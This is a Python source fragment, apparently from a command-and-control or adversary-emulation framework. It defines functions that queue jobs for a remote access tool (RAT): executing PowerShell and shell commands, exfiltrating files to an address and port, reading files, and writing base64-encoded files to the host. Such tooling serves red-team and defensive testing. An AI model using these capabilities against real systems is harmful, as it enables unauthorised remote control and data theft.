def powershell_function(rat: Rat, script_anchor: str,
command: PSFunction) -> Job:
stdin = "[[" + script_anchor + "]] " + command.command.command_line
return Job.create_rat_command(rat,
Opcodes.EXECUTE,
command_line=powershell.PS_COMMAND,
stdin=stdin)
def exfil_network_connection(rat: Rat, addr: str, port: str, file_path: str,
method: str) -> Job:
return Job.create_rat_command(rat,
Opcodes.EXFIL_CONNECTION,
address=addr,
port=port,
file_path=file_path,
method=method)
def send_shell_command(rat: Rat, cmd: str) -> Job:
return Job.create_rat_command(rat, Opcodes.EXECUTE, command_line=cmd)
def read_file(rat: Rat, file_path: str):
return Job.create_rat_command(rat, Opcodes.READ_FILE, file_path=file_path)
def drop_file(rat: Rat, file_path: str, contents: bytes):
return Job.create_rat_command(
rat,
Opcodes.WRITE_FILE,
file_path=file_path,
contents=base64.encodebytes(contents).decode('utf-8'))